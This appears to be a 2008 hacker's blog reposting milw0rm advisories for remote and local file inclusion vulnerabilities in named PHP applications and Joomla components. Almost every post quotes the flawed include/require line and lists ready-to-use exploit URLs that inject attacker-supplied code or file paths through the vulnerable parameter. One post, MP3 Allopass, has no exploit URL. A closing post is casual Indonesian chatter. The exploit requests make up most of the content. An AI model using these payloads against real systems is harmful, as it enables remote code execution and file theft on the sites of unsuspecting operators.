Fast CLick SQL 1.1.7 Lite - RFI  

Tuesday, October 28, 2008

[o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability
Software : Fast CLick SQL Lite version 1.1.7
Vendor   : http://www.ftrsoft.com/
Download : http://www.ftrsoft.com/downloads.html
Author   : NoGe

[o] Vulnerable file
common/init.php
require($CFG['CDIR'].'/global.php');
require($CFG['CDIR'].'/sql.php');

[o] Exploit
http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]

[o] Publish
http://milw0rm.com/exploits/6785

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

asiCMS alpha 0.208 - Multiple RFI   

[o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
Software : asiCMS version alpha 0.208
Vendor   : http://asicms.sourceforge.net/
Download : http://sourceforge.net/project/showfiles.php?group_id=203457
Author   : NoGe

[o] Vulnerable file
classes/Auth/OpenID/Association.php
classes/Auth/OpenID/BigMath.php
classes/Auth/OpenID/DiffieHellman.php
classes/Auth/OpenID/DumbStore.php
classes/Auth/OpenID/Extension.php
classes/Auth/OpenID/FileStore.php
classes/Auth/OpenID/HMAC.php
classes/Auth/OpenID/MemcachedStore.php
classes/Auth/OpenID/Message.php
classes/Auth/OpenID/Nonce.php
classes/Auth/OpenID/SQLStore.php
classes/Auth/OpenID/SReg.php
classes/Auth/OpenID/TrustRoot.php
classes/Auth/OpenID/URINorm.php
classes/Auth/Yadis/XRDS.php
classes/Auth/Yadis/XRI.php
classes/Auth/Yadis/XRIRes.php
All the file is affected by _ENV[asicms][path] variable

[o] Exploit
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=[evilcode]


[o] Publish
http://milw0rm.com/exploits/6685

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

X7 Chat 2.0.1A1 - LFI   

[o] X7 Chat 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor   : http://x7chat.com/
Author   : NoGe

[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");

[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]

[o] Publish
http://milw0rm.com/exploits/6592

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

LetterIt 2 - LFI   

[o] LetterIt 2 Local File Inclusion Vulnerability
Software : LetterIt Newsletter Manager version 2
Vendor   : http://www.letterit.de/
Author   : NoGe

[o] Vulnerable file
inc/wysiwyg.php
include("../language/".$_GET['language'].".php");

[o] Exploit
http://localhost/[path]/inc/wysiwyg.php?language=[LFI]

[o] Publish
http://milw0rm.com/exploits/6179

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

TalkBack 2.3.5 - LFI   

[o] TalkBack 2.3.5 Local File Inclusion Vulnerability
Software : TalkBack version 2.3.5
Vendor   : http://www.scripts.oldguy.us/talkback
Author   : NoGe

[o] Vulnerable file
install/help.php
include "../language/{$_REQUEST['language']}.php";

[o] Exploit
http://localhost/[path]/install/help.php?language=[LFI]

[o] Publish
http://milw0rm.com/exploits/6148

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Joomla Visites 1.1 RC2 - RFI   

[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor   : http://www.joomla-visites.net/
Author   : NoGe

[o] Vulnerable file
administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';

[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]

[o] Publish
http://milw0rm.com/exploits/5497

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Online FlashQuiz 1.0.2 - RFI   

[o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Software : com_onlineflashquiz version 1.0.2 - paid component
Vendor   : www.elearningforce.biz
Author   : NoGe

[o] Vulnerable file
component/com_onlineflashquiz/quiz/common/db_config.inc.php
include_once($base_dir."common/classes/DBBase.class.php");

[o] Exploit
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode]

[o] Publish
http://milw0rm.com/exploits/5345

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

phpBBXS 058-006 - RFI   

[o] phpBBXS 058-006 Remote File Inclusion Vulnerability
Software : phpBBXS version 058-006
Vendor   : http://www.phpbbxs.nl/
Author   : NoGe

[o] Vulnerable file
bb_usage_stats/include/bb_usage_stats.php
include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);

[o] Exploit
http://localhost/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]

[o] Publish
http://www.securityfocus.com/bid/20046

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

TalkBack 2.2.7 - RFI   

[o] TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Vendor   : http://www.scripts.oldguy.us/talkback
Author   : NoGe

[o] Vulnerable file
comments-display-tpl.php
include $language_file;
include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
include $language_file;

[o] Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]

[o] Publish
http://milw0rm.com/exploits/4640

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

JUser Joomla Component 1.0.14 - RFI   

[o] JUser Joomla Component 1.0.14 Remote File Include Vulnerability
Software : com_juser version 1.0.14 - paid component
Vendor   : www.joomlaequipment.com
Author   : NoGe

[o] Vulnerable file
administrator/components/com_juser/xajax_functions.php
require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');

[o] Exploit
http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]

[o] Publish
http://milw0rm.com/exploits/4636

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

MP3 Allopass Joomla Component 1.0 - RFI   

[o] com_mp3_allopass joomla component Remote File Include Vulnerability
Software : com_mp3_allopass
Download : http://www.joomlaratings.com
Author   : NoGe

[o] Vulnerable file
components/com_mp3_allopass/allopass.php
require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");
components/com_mp3_allopass/allopass-error.php
require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

[o] Publish
http://milw0rm.com/exploits/4507

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

JContentSubscription Joomla Component 1.5.8 - Multiple RFI   

[o] JContentSubscription Joomla Component 1.5.8 Multiple Remote File Include Vulnerability
Software : com_jcs version 1.5.8 - payable component
Vendor   : www.joomlaequipment.com
Author   : NoGe

[o] Vulnerable file
administrator/components/com_jcs/jcs.function.php
require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/add.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/history.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/register.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/views/list.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/list.user.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/reports.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

[o] Exploit
http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

[o] Publish
http://milw0rm.com/exploits/4508

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

WMTportfolio Joomla Component 1.0 - RFI   

[o] wmtportfolio joomla component 1.0 Remote File Include Vulnerability
Software : com_wmtportfolio version 1.0
Download : http://www.webmaster-tips.net/
Author   : NoGe

[o] Vulnerable file
administrator/components/com_wmtportfolio/admin.wmtportfolio.php
include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );

[o] Exploit
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]

[o] Publish
http://milw0rm.com/exploits/4497

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Joomla Component Panoramic Ver 1.0 - RFI  

Monday, October 27, 2008


[o] panoramic joomla component 1.0 Remote File Include Vulnerability
Software : com_panoramic version 1.0
Download : http://www.webmaster-tips.net/
Author   : NoGe

[o] Vulnerable file
administrator/components/com_panoramic/admin.panoramic.php
line 3 include( "$mosConfig_live_site/components/com_panoramic/about.html" );

[o] Exploit
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]

[o] Publish
http://milw0rm.com/exploits/4489

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

hikz hikz  

waaaaa... akhir ne buad blog baru lage.
blog lama dah lupa email en passwd login ne. lolz

ya udeh enjoy this f*ckin blog!!

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Subscribe to: Posts (Atom)

[d]esign by Amanda [e]dited by NoGe